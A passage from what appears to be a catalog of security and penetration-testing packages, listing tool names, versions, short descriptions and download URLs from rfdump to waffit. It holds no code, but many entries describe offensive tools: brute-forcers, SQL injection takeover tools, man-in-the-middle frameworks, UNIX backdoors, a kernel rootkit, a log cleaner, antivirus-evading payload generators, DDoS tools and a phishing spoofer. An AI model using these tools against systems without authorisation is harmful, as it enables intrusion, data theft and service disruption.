http://www.rfdump.org rfidiot e302bb7 An open source python library for exploring RFID devices. http://rfidiot.org/ rfidtool 0.01 A opensource tool to read / write rfid tags http://www.bindshell.net/tools/rfidtool.html ridenum 39.ebbfaca A null session RID cycle attack for brute forcing domain controllers. https://github.com/trustedsec/ridenum rifiuti2 0.5.1 A rewrite of rifiuti, a great tool from Foundstone folks for analyzing Windows Recycle Bin INFO2 file. https://code.google.com/p/rifiuti2/ rinetd 0.62 internet redirection server http://www.boutell.com/rinetd ripdc 0.2 A script which maps domains related to an given ip address or domainname. http://nullsecurity.net/tools/scanner rkhunter 1.4.2 Checks machines for the presence of rootkits and other unwanted tools. http://rkhunter.sourceforge.net/ rlogin-scanner 0.2 Multithreaded rlogin scanner. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/ rootbrute 0.1 Local root account bruteforcer. http://www.packetstormsecurity.org/ ropeadope 1.1 A linux log cleaner. http://www.highhacksociety.com/ ropeme 1.0 ROPME is a set of python scripts to generate ROP gadgets and payload. http://www.vnsecurity.net/2010/08/ropeme-rop-exploit-made-easy/ ropgadget 5.3 Lets you search your gadgets on your binaries (ELF format) to facilitate your ROP exploitation. https://github.com/JonathanSalwan/ROPgadget ropper 91.212d5da It can show information about files in different file formats and you can find gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. https://github.com/sashs/Ropper rpdscan 2.a71b0f3 Remmina Password Decoder and scanner. https://github.com/freakyclown/RPDscan rrs 1.70 A reverse (connecting) remote shell. Instead of listening for incoming connections it will connect out to a listener (rrs in listen mode). With tty support and more. http://www.cycom.se/dl/rrs rsakeyfind 1.0 A tool to find RSA key in RAM. http://citp.princeton.edu/memory/code/ rsmangler 1.4 rsmangler takes a wordlist and mangle it http://www.randomstorm.com/rsmangler-security-tool.php rtlsdr-scanner 856.a47ba2e A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library. https://github.com/EarToEarOak/RTLSDR-Scanner rtp-flood 1.0 RTP flooder http://www.hackingexposedvoip.com/ rtpbreak 1.3a Detects, reconstructs and analyzes any RTP session http://xenion.antifork.org/rtpbreak/ rubilyn 0.0.1 64bit Mac OS-X kernel rootkit that uses no hardcoded address to hook the BSD subsystem in all OS-X Lion & below. It uses a combination of syscall hooking and DKOM to hide activity on a host. http://nullsecurity.net/tools/backdoor.html ruby-msgpack 0.5.8 MessagePack, a binary-based efficient data interchange format. http://msgpack.org/ ruby-ronin 1.5.0 A Ruby platform for exploit development and security research. http://ronin-ruby.github.io/ ruby-ronin-support 0.5.1 A support library for Ronin. http://ronin-ruby.github.io/ ruby-uri-query_params 0.7.0 Access the query parameters of a URI, just like in PHP. http://github.com/postmodern/uri-query_params rww-attack 0.9.2 The Remote Web Workplace Attack tool will perform a dictionary attack against a live Microsoft Windows Small Business Server's 'Remote Web Workplace' portal. It currently supports both SBS 2003 and SBS 2008 and includes features to avoid account lock out. http://packetstormsecurity.com/files/79021/Remote-Web-Workplace-Attack-Tool.html safecopy 1.7 A disk data recovery tool to extract data from damaged media http://safecopy.sourceforge.net/ sakis3g 0.2.0e An all-in-one script for connecting with 3G http://www.sakis3g.org/ sambascan 0.5.0 Allows you to search an entire network or a number of hosts for SMB shares. It will also list the contents of all public shares that it finds. http://sourceforge.net/projects/sambascan2/ samdump2 3.0.0 Dump password hashes from a Windows NT/2k/XP installation http://sourceforge.net/projects/ophcrack/files/samdump2/ samydeluxe 2.2ed1bac Automatic samdump creation script. http://github.com/jensp/samydeluxe sandy 6.531ab16 An open-source Samsung phone encryption assessment framework https://github.com/donctl/sandy sasm 3.1.0 A simple crossplatform IDE for NASM, MASM, GAS and FASM assembly languages. https://github.com/Dman95/SASM sb0x 19.04f40fe A simple and Lightweight framework for Penetration testing. https://github.com/levi0x0/sb0x-project sbd 1.36 Netcat-clone, portable, offers strong encryption - features AES-CBC + HMAC-SHA1 encryption, program execution (-e), choosing source port, continuous reconnection with delay + more http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=sbd scalpel 2.0 A frugal, high performance file carver http://www.digitalforensicssolutions.com/Scalpel/ scanmem 0.13 A utility used to locate the address of a variable in an executing process. http://code.google.com/p/scanmem/ scanssh 2.1 Fast SSH server and open proxy scanner. http://www.monkey.org/~provos/scanssh/ scapy 2.2.0 A powerful interactive packet manipulation program written in Python http://www.secdev.org/projects/scapy/ schnappi-dhcp 0.1 schnappi can fuck network with no DHCP http://www.emanuelegentili.eu/ scout2 196.7cc58b4 Security auditing tool for AWS environments. http://isecpartners.github.io/Scout2/ scrapy 4419.c485a05 A fast high-level scraping and web crawling framework. http://www.scrapy.org/ scrounge-ntfs 0.9 Data recovery program for NTFS file systems http://memberwebs.com/stef/software/scrounge/ sctpscan 1.0 A network scanner for discovery and security http://www.p1sec.com/ seat 0.3 Next generation information digging application geared toward the needs of security professionals. It uses information stored in search engine databases, cache repositories, and other public resources to scan web sites for potential vulnerabilities. http://thesprawl.org/projects/search-engine-assessment-tool/ secscan 1.5 Web Apps Scanner and Much more utilities. http://code.google.com/p/secscan-py/ secure-delete 3.1 Secure file, disk, swap, memory erasure utilities. http://www.thc.org/ sees 67.cd741aa Increase the success rate of phishing attacks by sending emails to company users as if they are coming from the very same company's domain. https://github.com/galkan/sees/ sergio-proxy 0.2.1 A multi-threaded transparent HTTP proxy for manipulating web traffic https://github.com/darkoperator/dnsrecon sessionlist 1.0 Sniffer that intents to sniff HTTP packets and attempts to reconstruct interesting authentication data from websites that do not employ proper secure cookie auth. http://www.0xrage.com/ set 6.1.2 Social-engineer toolkit. Aimed at penetration testing around Social-Engineering https://www.trustedsec.com/downloads/social-engineer-toolkit sfuzz 0.7.0 A simple fuzzer. http://aconole.brad-x.com/programs/sfuzz.html shellcodecs 0.1 A collection of shellcode, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process. http://www.blackhatlibrary.net/Shellcodecs shellme 3.8c7919d Because sometimes you just need shellcode and opcodes quickly. This essentially just wraps some nasm/objdump calls into a neat script. https://github.com/hatRiot/shellme shellnoob 2.1 A toolkit that eases the writing and debugging of shellcode https://github.com/reyammer/shellnoob shortfuzzy 0.1 A web fuzzing script written in perl. http://packetstormsecurity.com/files/104872/Short-Fuzzy-Rat-Scanner.html sidguesser 1.0.5 Guesses sids/instances against an Oracle database according to a predefined dictionary file. http://www.cqure.net/wp/tools/database/sidguesser/ siege 3.0.8 An http regression testing and benchmarking utility http://www.joedog.org/JoeDog/Siege silk 3.9.0 A collection of traffic analysis tools developed by the CERT NetSA to facilitate security analysis of large networks. https://tools.netsa.cert.org/silk/ simple-ducky 1.1.1 A payload generator. https://code.google.com/p/simple-ducky-payload-generator simple-lan-scan 1.0 A simple python script that leverages scapy for discovering live hosts on a network. http://packetstormsecurity.com/files/97353/Simple-LAN-Scanner.0.html sinfp 1.22 A full operating system stack fingerprinting suite. http://www.networecon.com/tools/sinfp/ siparmyknife 11232011 A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications. http://packetstormsecurity.com/files/107301/sipArmyKnife_11232011.pl.txt sipcrack 0.2 A SIP protocol login cracker. http://www.remote-exploit.org/codes_sipcrack.html sipp 3.3 A free Open Source test tool / traffic generator for the SIP protocol. http://sipp.sourceforge.net/ sipsak 0.9.6 A small command line tool for developers and administrators of Session Initiation Protocol (SIP) applications. http://sipsak.org sipscan 0.1 A sip scanner. http://www.hackingvoip.com/sec_tools.html sipshock 6.1d636ab A scanner for SIP proxies vulnerable to Shellshock. https://github.com/zaf/sipshock sipvicious 0.2.8 Tools for auditing SIP devices http://blog.sipvicious.org skipfish 2.10b A fully automated, active web application security reconnaissance tool http://code.google.com/p/skipfish/ skyjack 7.5f7a25e Takes over Parrot drones, deauthenticating their true owner and taking over control, turning them into zombie drones under your own control. https://github.com/samyk/skyjack skype-dump 0.1 This is a tool that demonstrates dumping MD5 password hashes from the configuration file in Skype. http://packetstormsecurity.com/files/119155/Skype-Hash-Dumper.0.html skypefreak 30.14a81cb A Cross Platform Forensic Framework for Skype. http://osandamalith.github.io/SkypeFreak/ sleuthkit 4.1.3 File system and media management forensic analysis tools http://www.sleuthkit.org/sleuthkit slowhttptest 1.5 A highly configurable tool that simulates application layer denial of service attacks http://code.google.com/p/slowhttptest slowloris 0.7 A tool which is written in perl to test http-server vulnerabilites for connection exhaustion denial of service (DoS) attacks so you can enhance the security of your webserver. http://ha.ckers.org/slowloris/ smali 1.4.1 An assembler/disassembler for Android's dex format http://code.google.com/p/smali/ smartphone-pentest-framework 95.20918b2 Repository for the Smartphone Pentest Framework (SPF). https://github.com/georgiaw/Smartphone-Pentest-Framework smbbf 0.9.1 SMB password bruteforcer. http://packetstormsecurity.com/files/25381/smbbf.9.1.tar.gz.html smbexec 148.7827616 A rapid psexec style attack with samba tools. https://github.com/pentestgeek/smbexec smbrelay 3 SMB / HTTP to SMB replay attack toolkit. http://www.tarasco.org/security/smbrelay/ smtp-fuzz 1.0 Simple smtp fuzzer none smtp-user-enum 1.2 Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO. http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum smtp-vrfy 1.0 An SMTP Protocol Hacker. smtpmap 0.8.234_BETA Tool to identify the running smtp software on a given host. http://www.projectiwear.org/~plasmahh/software.html smtpscan 0.5 An SMTP scanner http://packetstormsecurity.com/files/31102/smtpscan.5.tar.gz.html sn00p 0.8 A modular tool written in bourne shell and designed to chain and automate security tools and tests. http://www.nullsecurity.net/tools/automation.html sniffjoke 0.4.1 Injects packets in the transmission flow that are able to seriously disturb passive analysis like sniffing, interception and low level information theft. http://www.delirandom.net/sniffjoke/ snmp-fuzzer 0.1.1 SNMP fuzzer uses Protos test cases with an entirely new engine written in Perl. http://www.arhont.com/en/category/resources/tools-utilities/ snmpattack 1.8 SNMP scanner and attacking tool. http://www.c0decafe.de/ snmpcheck 1.8 A free open source utility to get information via SNMP protocols. http://www.nothink.org/perl/snmpcheck/ snmpenum 1.7 snmp enumerator http://www.filip.waeytens.easynet.be/ snmpscan 0.1 A free, multi-processes SNMP scanner http://www.nothink.org/perl/snmpscan/index.php snoopy-ng 93.e305420 A distributed, sensor, data collection, interception, analysis, and visualization framework. https://github.com/sensepost/snoopy-ng snort 2.9.6.1 A lightweight network intrusion detection system. http://www.snort.org snow 20130616 Steganography program for concealing messages in text files. http://darkside.com.au/snow/index.html snscan 1.05 A Windows based SNMP detection utility that can quickly and accurately identify SNMP enabled devices on a network. http://www.mcafee.com/uk/downloads/free-tools/snscan.aspx socat 1.7.2.4 Multipurpose relay http://www.dest-unreach.org/socat/ soot 2.5.0 A Java Bytecode Analysis and Transformation Framework. http://www.sable.mcgill.ca/soot spade 114 A general-purpose Internet utility package, with some extra features to help in tracing the source of spam and other forms of Internet harassment. http://www.hoobie.net/brutus/ sparty 0.1 An open source tool written in python to audit web applications using sharepoint and frontpage architecture. http://sparty.secniche.org/ spectools 2010_04_R1 Spectrum-Tools is a set of utilities for using the Wi-Spy USB spectrum analyzer hardware. Stable version. http://www.kismetwireless.net/spectools/ speedpwn 8.3dd2793 An active WPA/2 Bruteforcer, original created to prove weak standard key generation in different ISP labeled routers without a client is connected. https://gitorious.org/speedpwn/ spiderfoot 2.1.5 The Open Source Footprinting Tool http://spiderfoot.net/ spiderpig-pdffuzzer 0.1 A javascript pdf fuzzer https://code.google.com/p/spiderpig-pdffuzzer/ spiga 7240.3a804ac Configurable web resource scanner https://github.com/getdual/scripts-n-tools/blob/master/spiga.py spike 2.9 IMMUNITYsec's fuzzer creation kit in C http://www.immunitysec.com/resources-freesoftware.shtml spike-proxy 148 A Proxy for detecting vulnerabilities in web applications http://www.immunitysec.com/resources-freesoftware.shtml spiped 1.4.1 A utility for creating symmetrically encrypted and authenticated pipes between socket addresses. https://www.tarsnap.com/spiped.html spipscan 8340.db8ef4a SPIP (CMS) scanner for penetration testing purpose written in Python. https://github.com/PaulSec/SPIPScan splint 3.1.2 A tool for statically checking C programs for security vulnerabilities and coding mistakes http://www.splint.org/ sploitctl 1.1 Fetch, install and search exploit archives from exploit sites like exploit-db and packetstorm. https://github.com/BlackArch/sploitctl sploitego 153.d9568dc Maltego Penetration Testing Transforms. https://github.com/allfro/sploitego spooftooph 0.5.2 Designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain sight http://www.hackfromacave.com/projects/spooftooph.html sps 4.2 A Linux packet crafting tool. Supports IPv4, IPv6 including extension headers, and tunneling IPv6 over IPv4. https://sites.google.com/site/simplepacketsender/ sqid 0.3 A SQL injection digger. http://sqid.rubyforge.org/ sqlbrute 1.0 Brute forces data out of databases using blind SQL injection. http://www.justinclarke.com/archives/2006/03/sqlbrute.html sqlmap 6445.20c272b An automatic SQL injection tool developed in Python. http://sqlmap.sourceforge.net sqlninja 0.2.6_r1 A tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end http://sqlninja.sourceforge.net/ sqlpat 1.0.1 This tool should be used to audit the strength of Microsoft SQL Server passwords offline. http://www.cqure.net/wp/sqlpat/ sqlping 4 SQL Server scanning tool that also checks for weak passwords using wordlists. http://www.sqlsecurity.com/downloads sqlsus 0.7.2 An open source MySQL injection and takeover tool, written in perl http://sqlsus.sourceforge.net/ ssh-privkey-crack 0.3 A SSH private key cracker https://code.google.com/p/lusas/ sshatter 1.2 Password bruteforcer for SSH http://www.nth-dimension.org.uk/downloads.php?id=34 sshscan 7401.3bfd4ae A horizontal SSH scanner that scans large swaths of IPv4 space for a single SSH user and pass. https://github.com/getdual/scripts-n-tools/blob/master/sshscan.py sshtrix 0.0.2 A very fast multithreaded SSH login cracker http://nullsecurity.net/tools/cracker.html sshuttle 198.9ce2fa0 Transparent proxy server that works as a poor man's VPN. Forwards all TCP packets over ssh (and even DNS requests when using --dns option). Doesn't require admin privileges on the server side. https://github.com/apenwarr/sshuttle ssl-hostname-resolver 1 CN (Common Name) grabber on X.509 Certificates over HTTPS. http://packetstormsecurity.com/files/120634/Common-Name-Grabber-Script.html ssl-phuck3r 2.0 All in one script for Man-In-The-Middle attacks. https://github.com/zombiesam/ssl_phuck3r sslcat 1.0 SSLCat is a simple Unix utility that reads and writes data across an SSL enable network connection. http://www.bindshell.net/tools/sslcat sslcaudit 522.5b6be3e Utility to perform security audits of SSL/TLS clients. https://github.com/grwl/sslcaudit ssldump 0.9b3 an SSLv3/TLS network protocol analyzer http://www.rtfm.com/ssldump/ sslh 1.16 SSL/SSH/OpenVPN/XMPP/tinc port multiplexer http://www.rutschle.net/tech/sslh.shtml sslmap 0.2.0 A lightweight TLS/SSL cipher suite scanner. http://thesprawl.org/projects/latest/ sslnuke 5.c5faeaa Transparent proxy that decrypts SSL traffic and prints out IRC messages. https://github.com/jtripper/sslnuke sslscan 239.1328b49 Tests SSL/TLS enabled services to discover supported cipher suites. https://github.com/DinoTools/sslscan sslsniff 0.8 A tool to MITM all SSL connections on a LAN and dynamically generate certs for the domains that are being accessed on the fly http://www.thoughtcrime.org/software/sslsniff/ sslsplit 0.4.9 A tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. http://www.roe.ch/SSLsplit sslstrip 0.9 Transparently hijack http traffic on a network, watch for https links and redirects, then map those links. http://www.thoughtcrime.org/software/sslstrip sslyze 0.10 Python tool for analyzing the configuration of SSL servers and for identifying misconfigurations. https://github.com/nabla-c0d3/sslyze/ stackflow 2.2af525d Universal stack-based buffer overfow exploitation tool. https://github.com/d4rkcat/stackflow starttls-mitm 7.b257756 A mitm proxy that will transparently proxy and dump both plaintext and TLS traffic. https://github.com/ipopov/starttls-mitm statsprocessor 0.10 A high-performance word-generator based on per-position Markov-attack. http://hashcat.net/wiki/doku.php?id=statsprocessor steghide 0.5.1 Embeds a message in a file by replacing some of the least significant bits http://steghide.sourceforge.net stompy 0.0.4 an advanced utility to test the quality of WWW session identifiers and other tokens that are meant to be unpredictable. http://lcamtuf.coredump.cx/ storm-ring 0.1 This simple tool is useful to test a PABX with "allow guest" parameter set to "yes" (in this scenario an anonymous caller could place a call). http://packetstormsecurity.com/files/115852/Storm-Ringing-PABX-Test-Tool.html stunnel 5.06 A program that allows you to encrypt arbitrary TCP connections inside SSL http://www.stunnel.org subdomainer 1.2 A tool designed for obtaining subdomain names from public sources. http://www.edge-security.com/subdomainer.php subterfuge 5.0 Automated Man-in-the-Middle Attack Framework http://kinozoa.com sucrack 1.2.3 A multi-threaded Linux/UNIX tool for brute-force cracking local user accounts via su http://labs.portcullis.co.uk/application/sucrack sulley 1.0.cb5e62c A pure-python fully automated and unattended fuzzing framework. https://github.com/OpenRCE/sulley/ superscan 4 Powerful TCP port scanner, pinger, resolver. http://www.foundstone.com/us/resources/proddesc/superscan.htm suricata 2.0.3 An Open Source Next Generation Intrusion Detection and Prevention Engine. http://openinfosecfoundation.org/index.php/download-suricata svn-extractor 28.3af00fb A simple script to extract all web resources by means of .SVN folder exposed over network. https://github.com/anantshri/svn-extractor swaks 20130209.0 Swiss Army Knife SMTP; Command line SMTP testing, including TLS and AUTH http://jetmore.org/john/code/swaks/ swfintruder 0.9.1 First tool for testing security in Flash movies. A runtime analyzer for SWF external movies. It helps to find flaws in Flash. http://code.google.com/p/swfintruder/ synflood 0.1 A very simply script to illustrate DoS SYN Flooding attack. http://thesprawl.org/projects/syn-flooder/ synner 1.1 A custom eth->ip->tcp packet generator (spoofer) for testing firewalls and dos attacks. http://packetstormsecurity.com/files/69802/synner.c.html synscan 5.02 fast asynchronous half-open TCP portscanner http://www.digit-labs.org/files/tools/synscan/ sysdig 1314.45921f5 Open source system-level exploration and troubleshooting tool. http://www.sysdig.org/ sysinternals-suite 1.2 Sysinternals tools suite. http://sysinternals.com/ t50 5.4.1 Experimental Multi-protocol Packet Injector Tool http://t50.sourceforge.net/ taof 0.3.2 Taof is a GUI cross-platform Python generic network protocol fuzzer. http://taof.sf.net tbear 1.5 Transient Bluetooth Environment Auditor includes an ncurses-based Bluetooth scanner (a bit similar to kismet), a Bluetooth DoS tool, and a Bluetooth hidden device locator. http://freshmeat.net/projects/t-bear tcgetkey 0.1 A set of tools that deal with acquiring physical memory dumps via FireWire and then scan the memory dump to locate TrueCrypt keys and finally decrypt the encrypted TrueCrypt container using the keys. http://packetstormsecurity.com/files/119146/tcgetkey.1.html tcpcontrol-fuzzer 0.1 2^6 TCP control bit fuzzer (no ECN or CWR). https://www.ee.oulu.fi/research/ouspg/tcpcontrol-fuzzer tcpdump 4.6.2 A tool for network monitoring and data acquisition http://www.tcpdump.org tcpextract 1.1 Extracts files from captured TCP sessions. Support live streams and pcap files. https://pypi.python.org/pypi/tcpextract/1.1 tcpflow 1.4.4 Captures data transmitted as part of TCP connections then stores the data conveniently http://afflib.org/software/tcpflow tcpick 0.2.1 TCP stream sniffer and connection tracker http://tcpick.sourceforge.net/ tcpjunk 2.9.03 A general tcp protocols testing and hacking utility http://code.google.com/p/tcpjunk tcpreplay 4.0.5 Gives the ability to replay previously captured traffic in a libpcap format http://tcpreplay.appneta.com tcptraceroute 1.5beta7 A traceroute implementation using TCP packets. http://michael.toren.net/code/tcptraceroute/ tcpwatch 1.3.1 A utility written in Python that lets you monitor forwarded TCP connections or HTTP proxy connections. http://hathawaymix.org/Software/TCPWatch tcpxtract 1.0.1 A tool for extracting files from network traffic. http://tcpxtract.sourceforge.net teardown 1.0 Command line tool to send a BYE request to tear down a call. http://www.hackingexposedvoip.com/ tekdefense-automater 52.6d0bd5a IP URL and MD5 OSINT Analysis https://github.com/1aN0rmus/TekDefense-Automater termineter 0.1.0 Smart meter testing framework https://code.google.com/p/termineter/ tftp-bruteforce 0.1 TFTP-bruteforcer is a fast TFTP filename bruteforcer written in perl. http://www.hackingexposedcisco.com/ tftp-fuzz 1337 Master TFTP fuzzing script as part of the ftools series of fuzzers http://nullsecurity.net/tools/fuzzer.html tftp-proxy 0.1 This tool accepts connection on tftp and reloads requested content from an upstream tftp server. Meanwhile modifications to the content can be done by pluggable modules. So this one's nice if your mitm with some embedded devices. http://www.c0decafe.de/ thc-ipv6 2.5 A complete tool set to attack the inherent protocol weaknesses of IPv6 and ICMP6, and includes an easy to use packet factory library. http://thc.org/thc-ipv6/ thc-keyfinder 1.0 Finds crypto keys, encrypted data and compressed data in files by analyzing the entropy of parts of the file. https://www.thc.org/releases.php thc-pptp-bruter 0.1.4 A brute force program that works against pptp vpn endpoints (tcp port 1723). http://www.thc.org thc-smartbrute 1.0 This tool finds undocumented and secret commands implemented in a smartcard. https://www.thc.org/thc-smartbrute/ thc-ssl-dos 1.4 A tool to verify the performance of SSL. To be used in your authorized and legitimate area ONLY. You need to accept this to make use of it, no use for bad intentions, you have been warned! http://www.thc.org/thc-ssl-dos/ theharvester 2.2a Python tool for gathering e-mail accounts and subdomain names from different public sources (search engines, pgp key servers) http://www.edge-security.com/theHarvester.php themole 0.3 Automatic SQL injection exploitation tool. http://sourceforge.net/projects/themole/ tiger 3.2.3 A security scanner, that checks computer for known problems. Can also use tripwire, aide and chkrootkit. http://www.nongnu.org/tiger/ tilt 90.2bc2ef2 An easy and simple tool implemented in Python for ip reconnaissance, with reverse ip lookup. https://github.com/AeonDave/tilt timegen 0.4 This program generates a *.wav file to "send" an own time signal to DCF77 compatible devices. http://bastianborn.de/radio-clock-hack/ tinc 1.0.24 VPN (Virtual Private Network) daemon http://www.tinc-vpn.org/ tinyproxy 1.8.3 A light-weight HTTP proxy daemon for POSIX operating systems. https://banu.com/tinyproxy/ tlsenum 75.6618285 A command line tool to enumerate TLS cipher-suites supported by a server. https://github.com/Ayrx/tlsenum tlspretense 0.6.2 SSL/TLS client testing framework https://github.com/iSECPartners/tlspretense tlssled 1.3 A Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. http://blog.taddong.com/2011/05/tlssled-v10.html tnscmd 1.3 a lame tool to prod the oracle tnslsnr process (1521/tcp) http://www.jammed.com/~jwa/hacks/security/tnscmd/ topera 19.3e230fd An IPv6 security analysis toolkit, with the particularity that their attacks can't be detected by Snort. https://github.com/toperaproject/topera tor 0.2.5.10 Anonymizing overlay network. http://www.torproject.org/ tor-autocircuit 0.2 Tor Autocircuit was developed to give users a finer control over Tor circuit creation. The tool exposes the functionality of TorCtl library which allows its users to control circuit length, speed, geolocation, and other parameters. http://www.thesprawl.org/projects/tor-autocircuit/ tor-browser-en 4.0.2 Tor Browser Bundle: Anonymous browsing using firefox and tor https://www.torproject.org/projects/torbrowser.html.en torshammer 1.0 A slow POST Denial of Service testing tool written in Python. http://sourceforge.net/projects/torshammer/ torsocks 2.0.0 Wrapper to safely torify applications http://code.google.com/p/torsocks tpcat latest TPCAT is based upon pcapdiff by the EFF. TPCAT will analyze two packet captures (taken on each side of the firewall as an example) and report any packets that were seen on the source capture but didn’t make it to the dest. http://sourceforge.net/projects/tpcat/ traceroute 2.0.21 Tracks the route taken by packets over an IP network http://traceroute.sourceforge.net/ trid 2.11 An utility designed to identify file types from their binary signatures http://mark0.net/soft-trid-e.html trinity 3728.985a087 A Linux System call fuzzer. http://codemonkey.org.uk/projects/trinity/ trixd00r 0.0.1 An advanced and invisible userland backdoor based on TCP/IP for UNIX systems http://nullsecurity.net/tools/backdoor.html truecrack 35 Password cracking for truecrypt(c) volumes. http://code.google.com/p/truecrack/ truecrypt 7.1a Free open-source cross-platform disk encryption software http://www.truecrypt.org/ tsh 0.6 An open-source UNIX backdoor that compiles on all variants, has full pty support, and uses strong crypto for communication. http://packetstormsecurity.com/search/?q=tsh tsh-sctp 2.850a2da An open-source UNIX backdoor. https://github.com/infodox/tsh-sctp tuxcut 5.0 Netcut-like program for Linux written in PyQt http://bitbucket.org/a_atalla/tuxcut/ twofi 2.0 Twitter Words of Interest. http://www.digininja.org/projects/twofi.php u3-pwn 2.0 A tool designed to automate injecting executables to Sandisk smart usb devices with default U3 software install http://www.nullsecurity.net/tools/backdoor.html *__uatester 1.06__ User Agent String Tester http://code.google.com/p/ua-tester/ *__ubertooth 2012.10.R1__ A 2.4 GHz wireless development board suitable for Bluetooth experimentation. Open source hardware and software. Tools only http://sourceforge.net/projects/ubertooth/ *__ubitack 0.3__ Tool, which automates some of the tasks you might need on a (wireless) penetration test or while you are on the go. https://code.google.com/p/ubitack/ *__udis86 1.7.2__ A minimalistic disassembler library http://udis86.sourceforge.net/ *__udptunnel 19__ Tunnels TCP over UDP packets. http://code.google.com/p/udptunnel/ *__uefi-firmware-parser 103.9d4d220__ Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc https://github.com/theopolis/uefi-firmware-parser *__ufo-wardriving 4__ Allows you to test the security of wireless networks by detecting their passwords based on the router model http://www.ufo-wardriving.com/ *__ufonet 9.5484a90__ A tool designed to launch DDoS attacks against a target, using 'Open Redirect' vectors on third party web applications, like botnet. https://github.com/epsylon/ufonet *__umap 25.3ad8121__ The USB host security assessment tool. https://github.com/nccgroup/umap *__umit 1.0__ A powerful nmap frontend. http://www.umitproject.org/ *__unhide 20130526__ A forensic tool to find processes hidden by rootkits, LKMs or by other techniques. http://sourceforge.net/projects/unhide/ *__unicorn 9.a18cb5d__ A simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. https://github.com/trustedsec/unicorn *__unicornscan 0.4.7__ A new information gathering and correlation engine. http://www.unicornscan.org/ *__uniofuzz 1337__ The universal fuzzing tool for browsers, web services, files, programs and network services/ports http://nullsecurity.net/tools/fuzzer.html *__uniscan 6.2__ A simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner. http://sourceforge.net/projects/uniscan/ *__unix-privesc-check 1.4__ Tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. databases) http://pentestmonkey.net/tools/audit/unix-privesc-check *__unsecure 1.2__ Bruteforces network login masks. http://www.sniperx.net/ *__upnpscan 0.4__ Scans the LAN or a given address range for UPnP capable devices. http://www.cqure.net/wp/upnpscan/ *__upx 3.91__ Ultimate executable compressor. http://upx.sourceforge.net/ *__urlcrazy 0.5__ Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. http://www.morningstarsecurity.com/research/urlcrazy *__urldigger 02c__ A python tool to extract URL addresses from different HOT sources and/or detect SPAM and malicious code https://code.google.com/p/urldigger/ *__username-anarchy 0.2__ Tools for generating usernames when penetration testing http://www.morningstarsecurity.com/research/username-anarchy *__usernamer 7.813139d__ Pentest Tool to generate usernames/logins based on supplied names. https://github.com/jseidl/usernamer *__uw-loveimap 0.1__ Multi threaded imap bounce scanner. http://uberwall.org/bin/download/45/UWloveimap.tgz *__uw-offish 0.1__ Clear-text protocol simulator. http://uberwall.org/bin/download/42/UW_offish.1.tar.gz *__uw-udpscan 0.1__ Multi threaded udp scanner. http://uberwall.org/bin/download/44/UWudpscan.tar.gz *__uw-zone 0.1__ Multi threaded, randomized IP zoner. http://uberwall.org/bin/download/43/UWzone.tgz *__v3n0m 77.cdaf14e__ Popular linux version of Balthazar/NovaCygni's 'v3n0m' scanner. Searches 18k+ dorks over 13 search engines. https://github.com/v3n0m-Scanner/V3n0M-Scanner * __valgrind 3.10.1__ A tool to help find memory-management problems in programs http://valgrind.org/ * __vanguard 0.1__ A comprehensive web penetration testing tool written in Perl thatidentifies vulnerabilities in web applications. http://packetstormsecurity.com/files/110603/Vanguard-Pentesting-Scanner.html * __vbrute 1.11dda8b__ Virtual hosts brute forcer. https://github.com/nccgroup/vbrute * __vega 1.0__ An open source platform to test the security of web applications https://github.com/subgraph/Vega/wiki * __veil 276.f6dc4ff__ A tool designed to generate metasploit payloads that bypass common anti-virus solutions. https://github.com/veil-evasion/Veil * __vfeed 36.a0fdf06__ Open Source Cross Linked and Aggregated Local Vulnerability Database main repository. http://www.toolswatch.org/vfeed * __vidalia 0.2.21__ Controller GUI for Tor https://www.torproject.org/vidalia * __videosnarf 0.63__ A new security assessment tool for pcap analysis http://ucsniff.sourceforge.net/videosnarf.html * __vinetto 0.07beta__ A forensics tool to examine Thumbs.db files http://vinetto.sourceforge.net * __viper 501.5f6a19a__ A Binary analysis framework. https://github.com/botherder/viper * __viproy-voipkit 2.0__ VoIP Pen-Test Kit for Metasploit Framework http://viproy.com/ * __vivisect 20140803__ A Python based static analysis and reverse engineering framework, Vdb is a Python based research/reversing focused debugger and programatic debugging API by invisigoth of kenshoto http://visi.kenshoto.com/ * __vnak 1.cf0fda7__ Aim is to be the one tool a user needs to attack multiple VoIP protocols. https://www.isecpartners.com/vnak.html * __vnc-bypauth 0.0.1__ Multi-threaded bypass authentication scanner for VNC servers <= 4.1.1. http://pentester.fr/resources/tools/techno/VNC/VNC_bypauth/ * __vncrack 1.21__ What it looks like: crack VNC. http://phenoelit-us.org/vncrack * __voiper 0.07__ A VoIP security testing toolkit incorporating several VoIP fuzzers and auxilliary tools to assist the auditor. http://voiper.sourceforge.net/ * __voiphopper 2.04__ A security validation tool that tests to see if a PC can mimic the behavior of an IP Phone. It rapidly automates a VLAN Hop into the Voice VLAN. http://voiphopper.sourceforge.net/ * __voipong 2.0__ A utility which detects all Voice Over IP calls on a pipeline, and for those which are G711 encoded, dumps actual conversation to seperate wave files. http://www.enderunix.org/voipong/ * __volatility 2.4.1__ A memory forensics toolkit. https://www.volatilesystems.com/default/volatility * __vstt 0.5.0__ VSTT is a multi-protocol tunneling tool. It accepts input by TCP stream sockets and FIFOs, and can send data via TCP, POP3, and ICMP tunneling. http://www.wendzel.de/dr.org/files/Projects/vstt/ * __vulscan 2.0__ A module which enhances nmap to a vulnerability scanner http://www.computec.ch/projekte/vulscan/ * __w3af 1.6__ Web Application Attack and Audit Framework. http://w3af.sourceforge.net/ * __waffit 30__ A set of security tools to identify and fingerprint Web Application 